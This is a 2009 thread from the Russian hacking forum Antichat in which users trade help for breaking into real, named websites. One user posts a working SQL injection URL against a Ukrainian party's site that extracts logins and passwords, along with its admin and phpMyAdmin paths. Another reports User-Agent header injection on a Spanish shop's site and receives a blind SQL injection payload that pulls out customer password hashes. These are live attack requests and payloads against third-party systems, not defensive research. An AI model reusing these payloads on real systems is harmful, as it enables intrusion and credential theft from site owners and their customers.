17.10.2009, 00:13
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Сообщение от TELO
Такая ситуация.
Есть сайт одной украинской партии.
Есть скуля по нему
Код:
http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8,9,10,11,12,13%20FROM%20private%20--
есть админка
Код:
http://www.prp.org.ua/phpmyadmin
есть ещё конфиг к ней, но я не знаю что с ней делать
Код:
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
Вот ещё сдесь директ админ
Код:
http://www.prp.org.ua/config
помогите...пароли не подходят, и что можно со всем этим сделать http://milw0rm.com/exploits/8921
|
|
|
16.10.2009, 18:04
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами:
9069748
Репутация:
438
|
|
phpmyadmin это оболчка для работы с базами данных mysql, а не админка
а вход на главной ))
|
|
|
|
16.10.2009, 18:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
|
|
|
|
16.10.2009, 18:22
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Сообщение от mailbrush
TELO, ты достаешь данные не из конфига MySQL / DirectAdmin'a.
а можно подробнее?
|
|
|
|
16.10.2009, 19:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от TELO
а можно подробнее?
Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
|
|
|
|
18.10.2009, 00:49
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Сообщение от mailbrush
Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
да эт ясно, не дурак...вопрос в том как достать данные для админки
|
|
|
|
16.10.2009, 21:08
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
Нашел инъекцию через юзер агента(Tampler data рулит).Как подставлять запросы?
Пробовал and+select+version() и тд-непрет.
Сайтик www.prozis.es
После названия браузера ставим кавычку.
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (' at line 1
replace into robots (user_agent, last_access, num_access) values ('Mozilla/5.0' (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',now(),0)
|
|
|
|
16.10.2009, 22:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
',(more1row_or_duplicate_column_names),'1'),('M
|
|
|
|
16.10.2009, 22:29
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от l1ght
',(more1row_or_duplicate_column_names),'1'),('M
Вот смотрите, дорогие друзья, вот так НЕНАДО помогать новичкам
l1ght ты правда думаешь, что он понял? 
|
|
|
|
16.10.2009, 22:46
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
С нами:
9296966
Репутация:
585
|
|
2Fed123
Почитай про blind-скл-инъекии статьи Elect'a и Qwazar'a на этом форуме.
Раскрутить можно:
Код:
User-Agent: Mozilla/5.0',if((locate(substr((select customers_password from customers limit 1),1),'0123456789abcdef')),now(),(select 1 union select 2)), 0) #
и т.д.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1603509){kind=avatar}
Похожие темы
Комбинированный вид
